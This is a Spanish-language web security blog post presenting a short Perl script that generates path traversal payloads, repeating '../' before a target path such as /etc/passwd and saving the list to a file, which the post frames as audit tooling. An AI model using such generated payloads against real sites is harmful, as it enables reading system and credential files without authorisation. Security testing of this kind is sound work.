Category: Seguridad Web

Repetir directorio/archivo

0

14 November 2010 at 2:45 Filed in:Programacion | Seguridad Web

Muchas veces cuando realizamos una auditoria de seguridad web, uno de las vulnerabilidades que buscamos es la de Path Traversal por este motivo hemos realizado este script en Perl, el cual nos genera una salida con el path a repetir, para usarlo en la busqueda de la vulnerabilidad.

Uso:

situ@tux $ perl repetir-path.pl
Uso: repetir-path.pl

Directorio/archivo [ej -> /etc/passwd]
Numero de veces que vamos a repetir [ej -> 10]
[Archivo donde guardamos el resulado -> salida.txt]

Codigo Fuente:

PLAIN TEXT
CODE:
  1. #!/usr/bin/perl
  2. if ( @ARGV != 3 ) {
  3.  
  4.     die "\nUse: $0 <path> <cantidad de repeticiones> <salida>\n\n"
  5.  
  6.       . "   <path>    Directorio/archivo         [ej -> /etc/passwd]\n"
  7.       . "   <cantidad de repeticiones>    Numero de veces que vamos a repetir [ej -> 60]\n"
  8.       . "   <salida>    [Archivo donde guardamos el resulado -> salida.txt]\n"
  9.       ;
  10.  
  11. }
  12. $path = $ARGV[0];
  13. chomp $path;
  14.  
  15. $repetir = $ARGV[1];
  16. chomp $repetir;
  17.  
  18. $salida = $ARGV[2];
  19. chomp $salida;
  20.  
  21. open (F,">> $salida");
  22.  
  23. $punto = "";
  24.  
  25. for ($i = 1; $i <= $repetir; $i++){
  26.  
  27.    $punto="$punto" . "../";
  28.     print "$punto" . "$path\n";
  29.    print F "$punto" . "$path\n";
  30.  
  31.  
  32. }
  33.  close (F)